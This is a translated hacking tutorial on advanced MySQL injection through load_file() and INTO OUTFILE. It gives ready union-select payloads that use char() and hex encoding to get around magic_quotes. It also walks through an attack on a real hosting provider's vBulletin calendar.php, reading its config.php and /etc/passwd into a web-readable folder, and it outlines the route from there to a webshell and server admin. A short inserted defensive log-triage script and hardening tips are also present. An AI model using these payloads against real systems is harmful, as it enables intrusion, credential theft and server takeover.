Advanced SQL Injection with MySQL

Source: Internet
Author: User
Tags: md5 hash, mysql functions, mysql injection

Text/figures: angel (Security Angel) [BST]

Preface

My "SQL Injection with MySQL" (the July special topic of "") gave a comprehensive introduction to MySQL injection, but there is one very harmful function that I did not mention in that article, because if it can be applied flexibly, the security of PHP and even of the whole server will be greatly compromised. Since "SQL Injection with MySQL" was published during the summer vacation, with many new users, students and people of bad moral character using it, I held this article back; in fact, it was completed in early May. After the topic was published, many people turned to research on PHP + MySQL injection, and many new techniques will be explored one after another; the advanced skills we have mastered in this area will also be published one after another. This article will not cover the basics.

Details

We know that various built-in MySQL functions can be used in SQL statements. DATABASE(), USER(), SYSTEM_USER(), SESSION_USER() and CURRENT_USER() are frequently used to obtain system information. Another widely used function is load_file(), which reads a file and returns its content as a string.
Here we can immediately think of what this allows: reading confidential files. But there are restrictions:

  • The file to be read must be on the server.
  • The complete file path must be specified.
  • You must have the permission to read and the file must be fully readable.
  • The file to be read must be smaller than max_allowed_packet.

If the file does not exist or cannot be read for any of the above reasons, the function returns NULL. The condition that is hardest to meet is the permission. On Windows, if NTFS permissions are set properly, the relevant files cannot be read; when a file is accessible only by administrators, do not count on load_file().

In actual injection, we have two difficulties to solve:

  • Finding the absolute physical path
  • Constructing a valid malformed statement

In many PHP programs, when a wrong query is submitted and display_errors = on, the program exposes the absolute path of the web directory. Once the path is known, for a PHP program that can be injected, the security of the entire server is seriously threatened. Constructing the statement itself needs no further discussion.

Exploitation

Assume that the SQL statement of a program is as follows:

SELECT * FROM article WHERE articleid=$id

  Note: The current condition is magic_quotes_gpc = off, and c:/boot.ini is readable.

In this case, we construct $id as:

-1 union select 1,1,load_file('c:/boot.ini')

Our query becomes:

SELECT * FROM article WHERE articleid=-1 union select 1,1,load_file('c:/boot.ini')

The program will honestly display the content of c:/boot.ini, but currently there are few hosts with magic_quotes_gpc = off. How can we construct a statement without quotation marks? Those who have read "SQL Injection with MySQL" certainly know: use the char() function, or convert the characters to hexadecimal notation.

  Note: The current condition is magic_quotes_gpc = on, and c:/boot.ini is readable.

We construct $id as:

-1 union select 1,1,load_file(char(99,58,47,98,111,111,116,46,105,110,105))

char(99,58,47,98,111,111,116,46,105,110,105) is the ASCII code of "c:/boot.ini", and our query becomes:

SELECT * FROM article WHERE articleid=-1 union select 1,1,load_file(char(99,58,47,98,111,111,116,46,105,110,105))

This also reads boot.ini successfully. The string can likewise be converted to hexadecimal: the hexadecimal value of "c:/boot.ini" is 0x633a2f626f6f742e696e69, so the preceding statement can also be written as:

SELECT * FROM article WHERE articleid=-1 union select 1,1,load_file(0x633a2f626f6f742e696e69)

This is a bit brief; the details depend on your own preference. You can enter the following query in phpMyAdmin or at the mysql> prompt and study it at leisure:

SELECT load_file([string])

Of course, in practical applications, due to various restrictions, the file content may not be displayed. We can also use INTO OUTFILE to export the file. Everyone knows how to use it, so I will not go into the details; an instance will explain everything.
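As an added example (not from the original article): a small Python log-triage script, written from the defender's side, that decodes the char()/0x literal obfuscation described above and flags requests using load_file() or INTO OUTFILE, so a reviewer sees which file path was targeted. The access-log lines are constructed samples that mirror the patterns in this article.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the article); the query strings
# mirror the load_file()/char()/0x patterns discussed above.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2004:10:00:00 +0800] "GET /calendar.php?action=edit&eventid=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2004:10:00:01 +0800] "GET /calendar.php?action=edit&eventid=-1%20union%20select%201,1,load_file(char(99,58,47,98,111,111,116,46,105,110,105)) HTTP/1.1" 200 1024',
    '10.0.0.9 - - [01/Jan/2004:10:00:02 +0800] "GET /calendar.php?action=edit&eventid=-1%20union%20select%201,1,load_file(0x633a2f626f6f742e696e69)%20into%20outfile%20%27/tmp/x.txt%27 HTTP/1.1" 500 0',
]

CHAR_RE = re.compile(r"char\s*\(\s*([0-9\s,]+)\)", re.IGNORECASE)
HEX_RE = re.compile(r"\b0x([0-9a-f]+)\b", re.IGNORECASE)
FILE_RE = re.compile(r"\bload_file\s*\(|\binto\s+(?:out|dump)file\b", re.IGNORECASE)
REQ_RE = re.compile(r'"(?:GET|POST) (\S+) ')


def decode_literals(s):
    """Replace MySQL char(...) and 0x... literals with the quoted string they
    build, so the path an attacker encoded becomes readable."""
    def char_sub(m):
        codes = [int(c) for c in "".join(m.group(1).split()).split(",") if c]
        return "'" + "".join(chr(c) for c in codes if c < 0x110000) + "'"

    def hex_sub(m):
        digits = m.group(1)
        if len(digits) % 2:          # odd length: not a valid byte string
            return m.group(0)
        return "'" + bytes.fromhex(digits).decode("latin-1") + "'"

    return HEX_RE.sub(hex_sub, CHAR_RE.sub(char_sub, s))


def analyse_line(line):
    """Return (client_ip, decoded_query, targeted_paths) for a request that
    uses a MySQL file primitive, or None for an ordinary request."""
    m = REQ_RE.search(line)
    if not m:
        return None
    query = unquote_plus(m.group(1))           # undo URL encoding first
    if not FILE_RE.search(query):
        return None
    decoded = decode_literals(query)
    paths = re.findall(r"load_file\s*\(\s*'([^']*)'", decoded, re.IGNORECASE)
    return line.split()[0], decoded, paths


def find_file_access_attempts(lines):
    """Triage a list of log lines and keep only the suspicious ones."""
    return [r for r in map(analyse_line, lines) if r]
```

Blocking at the database side is simpler than decoding: run the web application under a MySQL account without the FILE privilege and set secure_file_priv, so that load_file() and INTO OUTFILE cannot touch the web root at all.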

Instance

www.***host.cn is a famous FreeBSD hosting provider in China. We test with it because its forum uses vBB, which has the calendar.php problem; I do not need to go anywhere to find vulnerable websites (although they are everywhere). This is a complete security test: I only obtained information and did not enter the server.

Here is a bit of code from global.php in the root directory of vBB:

<?php
// Get rid of slashes in get/post/cookie data
function stripslashesarray(&$arr) {
    while (list($key, $val) = each($arr)) {
        if ($key != "templatesused" and $key != "argc" and $key != "argv") {
            // Strip string values whose key is lower-case or numeric
            if (is_string($val) AND (strtoupper($key) != $key OR ("".intval($key) == "$key"))) {
                $arr["$key"] = stripslashes($val);
            // Recurse into the request arrays and any lower-case keyed array
            } else if (is_array($val) AND ($key == 'HTTP_POST_VARS' OR $key == 'HTTP_GET_VARS' OR strtoupper($key) != $key)) {
                $arr["$key"] = stripslashesarray($val);
            }
        }
    }
    return $arr;
}

// If magic_quotes_gpc added the slashes, take them off again
if (get_magic_quotes_gpc() and is_array($GLOBALS)) {
    if (isset($attachment)) {
        $GLOBALS['attachment'] = addslashes($GLOBALS['attachment']);
    }
    if (isset($avatarfile)) {
        $GLOBALS['avatarfile'] = addslashes($GLOBALS['avatarfile']);
    }
    $GLOBALS = stripslashesarray($GLOBALS);
}

set_magic_quotes_runtime(0);

?>

This code removes the escape characters before all special characters if magic_quotes_gpc is enabled in php.ini, so the status of magic_quotes_gpc does not affect the single quotes we enter. You can inject them with confidence. Haha.

We know that submitting:

/calendar.php?action=edit&eventid=1 union select 1,1,1,1,username,password FROM user WHERE userid=1

can obtain the user name and the MD5 hash of the password, but it was not displayed for special reasons. However, from experience I know that the statement was constructed without error, so we can read and export data to a file.
Because I had happened to access a file containing phpinfo() earlier, I knew the absolute web path. From visiting the site, I found that an HTML file was generated by a download system; if the directory did not have write permission, HTML files could not be generated, but this is not the focus of this article. We have the following information:

  • Absolute web path: /home/4ngel
  • Writable directory path: /home/4ngel/soft/
  • magic_quotes_gpc = on

Compared with root on the host, the forum admin is nothing at all, and I am not interested in the forum admin. We want to read the forum's configuration file and /etc/passwd. If you know the MySQL connection information, you can start from there and write a webshell or other things. If you know /etc/passwd, we can crack the passwords and go straight in via ssh.

The vBB forum's configuration file is /home/4ngel/forum/admin/config.php. Convert it to ASCII codes and submit:

calendar.php?action=edit&eventid=1 union select 1,1,1,1,1,load_file(char(47,104,111,109,101,47,52,110,103,101,108,47,102,111,114,117,109,47,97,100,109,105,110,47,99,111,110,102,105,103,46,112,104,112)) FROM user WHERE userid=1 into outfile '/home/4ngel/soft/cfg.txt'

Remember to add a WHERE clause to set a condition; otherwise, if the forum has many users, the exported file will be quite large. Or you can simply specify $eventid as a non-existent value, so no WHERE is needed, like this:

calendar.php?action=edit&eventid=-1 union select 1,1,1,1,1,load_file(char(47,104,111,109,101,47,52,110,103,101,108,47,102,111,114,117,109,47,97,100,109,105,110,47,99,111,110,102,105,103,46,112,104,112)) FROM user into outfile '/home/4ngel/soft/cfg.txt'

Convert /etc/passwd to ASCII codes and submit:

calendar.php?action=edit&eventid=-1 union select 1,1,1,1,1,load_file(char(47,101,116,99,47,112,97,115,115,119,100)) FROM user into outfile '/home/4ngel/soft/etcpwd.txt'

Note that the following error message is displayed at the top of the forum:

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/4ngel/forum/admin/db_mysql.php on line 154

Experience tells us that the file has been exported successfully. Now request:

http://www.xxxhost.cn/soft/cfg.txt
http://www.xxxhost.cn/soft/etcpwd.txt

Then the passwords are displayed one by one; spoofing, logging on to the backend, uploading a backdoor, reading config.php, a whole series of steps, all of it I got from one load_file(). Isn't that very harmful?

I remember a discussion in a group where everyone had got into the Black and White server through the 9*.net website, but there was no way to break into the Black and White server itself. With the load_file() function, you can get onto the server where Black and White is hosted after learning some information. The process is the same as above: use the show.php vulnerability, load_file() the program's configuration file directly, learn the MySQL information, connect remotely, write to the database and export a file, and it is easy to get server admin.

Postscript

I had never dared to release this because it is too harmful. I believe some people in China know it too; it just has not been made public. After repeated consideration, I decided to release it. I hope that you will not perform any destructive operations on domestic sites. Thank you for your cooperation!
